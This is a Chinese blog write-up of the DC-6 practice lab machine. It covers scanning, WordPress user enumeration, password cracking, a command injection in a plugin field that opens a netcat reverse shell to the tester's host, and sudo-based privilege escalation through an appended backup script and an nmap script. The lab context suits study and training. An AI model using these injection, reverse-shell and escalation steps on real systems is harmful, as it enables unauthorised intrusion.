dc6靶机攻略

最新推荐文章于 2024-11-26 17:40:37 发布
最新推荐文章于 2024-11-26 17:40:37 发布
阅读量55 收藏
点赞数
分类专栏: 靶机系列 文章标签: 网络安全 安全 web安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/133999151
版权

dc6

扫描

image-20231023114206524

dirsearch -u http://10.4.7.149

image-20231023114226115

whatweb http://10.4.7.149

image-20231023115249077

扫描结果显示需要修改hosts才能访问主页

image-20231023114514522

随后可以使用http://wordy可以访问

image-20231023114654038

渗透

由于发现是wordpress搭建的,因此使用和dc2相同的操作试试看

wpscan --url http://dc-2 --enumerate u

使用wpscan获取用户名

image-20231023174318152

写入文件当做字典

随后使用cewl生成密码字典

cewl -w pojie1.txt http://wordy

wpscan爆破一下密码

wpscan --url http://wordy -U pojie_user.txt -P pojie1.txt

爆破不成功

image-20231023174758799

官网作者提示使用rockyou字典,而且还有筛选

得到用户信息

mark:helpdesk01

该用户即可登录wp

image-20231023201434063

在activity monitor tools发现疑似可以执行代码的框

image-20231023202736438f12看一下这个框,发现限制长度,把长度值直接改了,然后输入

127.0.0.1;nc -e /bin/bash 10.4.7.138 12138

反弹成功

image-20231023203113704

使用命令回显

python -c 'import pty;pty.spawn("/bin/bash")'

在/home/mark中发现该文件

image-20231023203738177

得到用户信息

graham:GSo7isUM1D4

提权

ssh可连接该用户

image-20231023203901948

使用sudo -l可以发现jens可以无密码执行backup.sh

追加写入该文件一条,执行时获取jens的shell

echo "/bin/bash" >> backups.sh

随后进入jens目录下执行文件

sudo -u jens /home/jens/backups.sh

image-20231023205545665

再次使用sudo -l

发现可以以root身份无密码执行nmap

image-20231023205632225

nmap的–script参数可以执行脚本

先写一个脚本文件,然后sudo执行

echo 'os.execute("/bin/bash")'>use.sh
sudo nmap --script=use.sh

这块貌似可能缺点啥…执行不顺畅,但是成功提权了

image-20231023210324244

image-20231023210408491

order libra
关注
专栏目录
DC6靶场通关详细记录】
博客
12-19 1228
主机靶场DC6通关详细记录
DC-6通关教程
m0_74402888的博客
04-25 980
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2130
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 894
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC-6靶机通关
qq_63831588的博客
07-29 2276
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 1174
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
DC-2靶机攻略
weixin_43179779的博客
10-16 1931
DC-2靶机攻略
DC-3靶机攻略
weixin_47311099的博客
07-16 465
DC-3攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap.sP 端口扫描 nmap -A 192.168.64.137 -p 1-65535 -oN NMAP_A 发现开放80端口 访问80 漏洞利用 安装joomla扫描工具joomscan apt-get install joomscan 查找cms版本漏洞 searchsploit Joomla 3.7.0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WEXzKK0O-
DC-1靶机攻略
记录日常学习
08-04 135
DC-1靶机提权通关,find / -exec "/bin/bash" -p \;
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8570
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
零基础学安全--shell脚本学习(1)脚本创建执行及变量使用
qq_66164763的博客
11-24 801
Shell又称命令解释器,它能识别用户输入的各种命令,并传递给操作系统。它的作用类似于Windows操作系统中的命令行,但是,Shell的功能远比命令行强大的多。在UNIX或者localhost中,Shell既是用户交互的界面,也是控制系定义:变量名=变量内容使用:$变量名(一般来说这里加不加引号效果是相同的,但是如果你在引用变量时加''就会直接把这个$变量名当作字符串输出,相当于一个转义字符)双引号和花括号括起来可以进行字符串的拼接。
零基础学安全--HTML
qq_66164763的博客
11-24 379
是用于创建网页和网页应用的标准标记语言。它使用一系列标签(tags)来描述网页的内容和结构。
Springboot组合SpringSecurity安全插件基于密码的验证Demo
最新发布
yrldjsbk的博客
11-26 96
下面的案例,都是基于数据库mysql,用户密码,验证登录的策略demo。WebSecurityConfigurerAdapter,这个有提示,说该抽象类已经被弃用。如图,这个接口需要带一个参数,username。我使用的是Apifox接口管理软件。4:创建一个测试控制器HelloController.测试一下效果。)类的名字你可以自己定义,但是必须实现这个插件的接口才行。2:增加配置类,配置基础的参数信息。引入maven仓库的坐标。3:需要创建一个实现了接口。
医疗数据质量安全,数据安全解决方案,医院关心的数据安全问题,信息安全方案(Word原件)
2301_79994950的博客
11-26 219
3.4.2网络可信接入 3.4.3应用身份识别 3.4.4抵御SQL注入 3.4.5虚拟补丁防护 3.4.6阻断漏洞攻击
文件防泄密怎么做才更安全
jinan886的博客
11-26 274
防止文件泄密是一项长期而艰巨的任务。但只要我们不断采用先进的技术手段,加强员工的信息安全意识培训,并不断完善管理制度,就一定能够有效地降低文件泄密的风险,确保企业的信息安全
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值